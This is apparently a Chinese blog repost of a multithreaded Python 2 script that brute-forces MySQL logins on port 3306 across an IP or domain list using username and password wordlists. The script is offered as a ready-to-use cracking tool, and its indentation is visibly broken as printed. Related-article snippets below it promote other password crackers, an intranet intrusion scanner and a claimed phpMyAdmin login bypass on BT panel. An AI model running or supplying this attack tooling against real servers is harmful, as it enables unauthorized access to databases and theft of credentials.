Mysql批量暴破代码

最新推荐文章于 2022-11-28 13:31:48 发布
最新推荐文章于 2022-11-28 13:31:48 发布
阅读量140 收藏 1
点赞数
文章标签: 数据库 python
原文链接:https://juejin.im/post/5c1c5282f265da61650189a4
版权

升级自:www.waitalone.cn/python-mysq… 在原基础上增加如下功能:

  1. 支持ip批量爆破,只需同目录存在ip.txt文件;

  2. 如果输入的目标是域名,将域名添加到用户列表,增加爆破成功率;

  3. 去掉了端口和数据库的输入,默认了端口3306和数据库mysql。

#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
import os, sys, re, socket, time  
from functools import partial  
from multiprocessing.dummy import Pool as ThreadPool  

	try:  
    import MySQLdb  
	except ImportError:  
    print '\n[!] MySQLdb模块导入错误,请到下面网址下载:'  
    print '[!] http://www.codegood.com/archives/129'  
    exit()  

	def usage():  
    print '+' + '-' * 50 + '+'  
    print '\t   Python MySQL批量爆破工具多线程版'  
    print '\t\t Time:2014-11-12'  
    print '+' + '-' * 50 + '+'  
    if len(sys.argv) != 4:  
        print "用法: " + os.path.basename(sys.argv[0]) + " 待破解的ip/domain或ip列表 用户名列表 密码列表"  
        print "实例: " + os.path.basename(sys.argv[0]) + " www.alin.cn或ip.txt user.txt pass.txt"  
        sys.exit()  

	def mysql_brute(user, password):  
    "mysql数据库破解函数"  
    db = None  
    try:  
        # print "user:", user, "password:", password  
        db = MySQLdb.connect(host=host, user=user, passwd=password, db="mysql", port=3306)  
        # print '[+] 破解成功:', user, password  
        result.append('ip:'+ host + '\t用户名:' + user + "\t密码:" + password)  
        print '[true] ip:'+ host + '\t用户名:' + user + "\t密码:" + password+'\n'  
    except KeyboardInterrupt:  
        print '大爷,按您的吩咐,已成功退出程序!'  
        exit()  
    except MySQLdb.Error, msg:  
        print '[false] ' + host+' '+user+':'+password+'\n'  
    finally:  
        if db:  
            db.close()  

	if __name__ == '__main__':  
    usage()  
    start_time = time.time()  
    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):  
        with open("tmp.txt","w") as f:  
            f.write(sys.argv[1])  
            ips = "tmp.txt"  
    elif re.match(r'\w+\.txt',sys.argv[1]):  
        ips = sys.argv[1]  
    else:  
        with open("tmp.txt","w") as f:  
            f.write(socket.gethostbyname(sys.argv[1]))  
            ips = "tmp.txt"  
        isExist = 0  
        isExist1 = 0  
        with open(sys.argv[2],'r') as tmp:  
            for line in tmp.readlines():  
                if sys.argv[1] in line:  
                    isExist = 1  
                    if isExist1 == 1:  
                        break  
                if re.sub(r'\.\w+$','',sys.argv[1]) in line:  
                    isExist1 = 1  
                    if isExist == 1:  
                        break  
        with open(sys.argv[2],"a") as f:  
            if isExist == 0:  
                f.write("\n"+sys.argv[1])  
            if isExist1 == 0:  
                f.write("\n"+re.sub(r'\.\w+$','',sys.argv[1]))  
    iplist = [k.rstrip() for k in open(ips)]              
    userlist = [i.rstrip() for i in open(sys.argv[2])]  
    passlist = [j.rstrip() for j in open(sys.argv[3])]  
    print '\n[+] 目  标:%s \n' % sys.argv[1]  
    print '[+] 用户名:%d 条\n' % len(userlist)  
    print '[+] 密  码:%d 条\n' % len(passlist)  
    print '[!] 密码破解中,请稍候……\n'  
    result = []  

    for host in iplist:  
        for user in userlist:  
            partial_user = partial(mysql_brute, user)  
            pool = ThreadPool(10)  
            pool.map(partial_user, passlist)  
            pool.close()  
            pool.join()  
    if len(result) != 0:  
        print '[+] 恭喜大爷,MySQL密码破解成功!\n'  
        for x in {}.fromkeys(result).keys():  
            print x + '\n'  
    else:  
        print '[-] 杯具了大爷,MySQL密码破解失败!\n'  
    print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)
复制代码
weixin_33827590
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
工具分享(2):MySQL批量爆破工具 [Python多线程版]
localhost01
10-08 4782
工具分享(2):MySQL批量爆破工具 [Python多线程版]   参考:https://www.waitalone.cn/python-mysql-mult.html 在他的基础上,增加了如下功能: 1.支持ip批量爆破,只需同目录存在ip.txt文件; 2.如果输入的目标是域名,将域名添加到用户列表,增加爆破成功率; 3.去掉了端口和数据库的输入,默认了端口3306和数据库mys...
第六天 02.mysql数据库的基本操作和密码爆破
qq_56414082的博客
01-02 929
数据库是什么​ 存储数据的仓库,数据是有组织的进行存储。mysql是一种关系数据库管理系统使用工具:phpstudymysql 默认端口 3306。
弱口令-爆破Mysql
HAKUNAMATATATTA的博客
11-28 2028
mysql弱口令爆破工具 不仅仅是MySQL
一个简单的python3批量爆破mysql
https://www.cnblogs.com/zpchcbd/
04-13 1979
# coding:utf-8 import pymysql import threading import time import IPy import subprocess def mysql_connect1(ip,shell_url,shell_content): #判断是否存活 if not(ping_ip(ip)): return #尝试数据库...
渗透之——MySQL暴力破解工具多线程版(基于Python语言编写)
冰河的专栏
01-01 3554
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85566045 今天是2019年元旦,首先祝大家元旦快乐,在这个喜庆的日子里,不知道大家有没有坚持研究自己所在领域的知识。其实,每项知识、技能的积累,需要的是日复一日的坚持,正所谓——持之以恒,贵在坚持,这样才能做到每天进步一点点。好了,步入正题,今天,闲来无事,基于Python...
mysql批量增加字段.txt
06-26
MySQL批量对表增加指定字段,会快速实现批量字段的添加。写了2个存储存储过程,执行即可。方便快速!
mysql数据库暴破
04-08
该资源为python编写的mysql暴力破解软件,采用多线程编写,爆破速度非常快。
mysql批量建表
01-05
利用mysql存储函数,方便快捷批量建立mysql数据库测试表
MYSQL批量插入数据的实现代码第1/3页
09-06
非常的实现原理,代码较多,建议大家仔细看看。
mysql批量导出建表语句.zip
08-15
kettle的mysql批量导出建表语句,可以快捷循环换导出mysql建表语句,可以下载下来学习参考
K8CScan:K8Cscan大型内网渗透自定义插件化扫描神器,包含信息收集,网络资产,入侵扫描,密码爆破,突破利用,程序采用多线程堆叠扫描大型内网多个IP段C段主机,现有插件包含:C段旁注扫描,子域名扫描,Ftp密码爆破,Mysql密码爆破,Oracle密码爆破,MSSQL密码爆破,WindowsLinux系统密码爆破,存活主机扫描,端口扫描,Web信息检测,操作系统版本检测,Cisco思科设备扫描等,支持调用任意外部程序或脚本,支持Cobalt Strike联动
02-03
K8Cscan5.4 20191101 最新版Ladon 程序简介 K8Cscan一个专用于大型内网渗透的高并发插件化扫描神器,包含信息收集,网络资产,入侵扫描,密码爆破,突破利用,支持批量A段/ B段/ C段以及跨网段扫描。5.4版本内置28个功能模块,通过各种协议以及方法快速获取目标网络存活主机IP,计算机名,工作组,网络共享,网卡物理地址,操作系统版本,网站域名,Web中间件,路由器(Cisco),数据库等网络资产信息,内置MS17-010(SMB扩展),Weblogic扩展,ActiveMQ漏洞检测,内置6种密码认证爆破3种数据库Mysql,Oracle,MSSQL),FTP密码爆破
记录一次使用metaspliot 爆破mysql的过程
daxi0ng的博客
03-14 2276
一、使用nmap获取目标ip信息 3306端口开启,mysql版本为5.7.24 二、将账号字典和密码字典放进root中,准备爆破账号,use auxiliary/scanner/mysql/mysql_login模块,设置参数 run一下,发现不支持这个MYSQL ,后得知是因为数据库拒绝远程连接的缘故。 mysql开启远程连接 今天在服务器安装了mysql,准备用mysqlguitool...
mysql3306多线程爆破工具修复版
safe6
12-18 5559
修复了数据库不存在bug 至于爆破速度快不快,你用过就知道!   链接:https://pan.baidu.com/s/1hC_XRTkaGI3jAEJmWPntlA  提取码:q6bp 
绕过前端加密进行爆破(附脚本)
Matthew
11-20 5021
在渗透的过程中,有时候会遇到密码在前端加密了,为我们爆破提高了难度。加密是js脚本自定义函数加密,burp里面的一些加密函数就满足不了我们的需求。如下所示,密码为admin123,加密的效果如下: 可以看到加密的函数主要是encode,所以每个密码都由自定义函数加密。最近在实战过程中get到一个new trick,利用相应的工具或者模块执行该 js 文件,拿到输出结果即可,可以使用 python
safe6出品java版3306多线程爆破工具
safe6
06-20 4527
一个简单的MySQL的账号密码爆破工具多线程版(16)。傻瓜式操作。成功率还得看自己的字典,推荐信息收集后用我的密码生成器自行生成。爆破速度还行,具体还得看目标的响应速度。使用方法建议用的start.bat打开,可以看到具体的爆破日志,成功后有弹窗,有成功的.txt文本。最后有问题直接说 链接:https://pan.baidu.com/s/1giL5xnXOERTNnXl3ZjMnjw密码:jq...
快速高效的破解MySQL本地和远程密码
weixin_30511107的博客
10-09 449
http://www.kankanews.com/ICkengine/archives/212.shtml   快速的 MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修补这个问题,看起来其实是个小错误而已。   我找到一个方法可非常高效的破解 MySQL 的用户密码,包括本地用户和通过网络方式访问的用户密码。在我的测试中,通过网络方式的方法可每秒钟测试 ...
宝塔进数据库的新漏洞版本4.4.x
CKT_GOD的博客
08-23 1055
最新别人爆出的新漏洞 用宝塔搭建的网站phpmyadmin版本是4.4就可以直接进数据库不用登录! 具体操作 http://IP:888/pma 就可以直接进数据库 我在网上直接扫了一个网站实验了下 修复方式,更新最新版本! ...
快速破解本地的mysql用户名和密码
Leo专题
12-14 6156
Windows: 1.用系统治理员登陆系统。 2.停止MySQL的服务。 3.进入命令窗口,然后进入MySQL的安装目录,比如我的安装目录是c:\mysql,进入C:\mysql\bin 4.跳过权限检查启动MySQL, c:\mysql\bin>mysqld-nt --skip-grant-tables 5.重新打开一个窗口,进入c:\mysql\bin目录,设置root的新密码 c:
MongoDB 部分索引(Partial Indexes)
乐沙弥的世界
12-27 7702
MongoDB部分索引只为那些在一个集合中,满足指定的筛选条件的文档创建索引。由于部分索引是一个集合文档的一个子集,因此部分索引具有较低的存储需求,并降低了索引创建和维护的性能成本。部分索引通过指定过滤条件来创建,可以为MongoDB支持的所有索引类型使用部分索引。
gorm写批量插入mysql代码
最新发布
03-09
可以使用gorm的Create函数和Slice传入一个结构体切片来实现批量插入mysql的操作,示例代码如下: ``` type User struct { Name string Age int } func main() { db, err := gorm.Open(mysql.Open("user:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值